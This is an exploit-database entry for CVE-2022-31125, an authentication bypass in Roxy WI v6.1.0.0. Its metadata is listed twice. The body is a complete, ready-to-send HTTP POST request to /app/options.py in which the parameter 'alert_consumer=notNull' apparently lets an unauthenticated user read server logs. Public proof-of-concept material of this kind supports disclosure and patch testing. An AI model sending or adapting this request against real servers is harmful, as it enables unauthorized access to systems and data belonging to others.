Roxy WI v6.1.0.0 - Improper Authentication Control
Author: Nuri Çilengir
type: webapps
platform: python
port:
date_added: 2023-04-03
date_updated: 2023-05-24
verified: 1
codes: CVE-2022-31125
tags:
aliases:
screenshot_url:
application_url:
raw file: 51226.txt
type: webapps
platform: python
port:
date_added: 2023-04-03
date_updated: 2023-05-24
verified: 1
codes: CVE-2022-31125
tags:
aliases:
screenshot_url:
application_url:
raw file: 51226.txt
# Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control # Date of found: 21 July 2022 # Application: Roxy WI <= v6.1.0.0 # Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org # Software Link: https://github.com/hap-wi/roxy-wi.git # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137 # Tested on: Ubuntu 22.04 # CVE : CVE-2022-31125 # PoC POST /app/options.py HTTP/1.1 Host: 192.168.56.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 105 Origin: https://192.168.56.114 Dnt: 1 Referer: https://192.168.56.114/app/login.py Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45
Copyright © 2024 Irfan TOOR all rights reserved.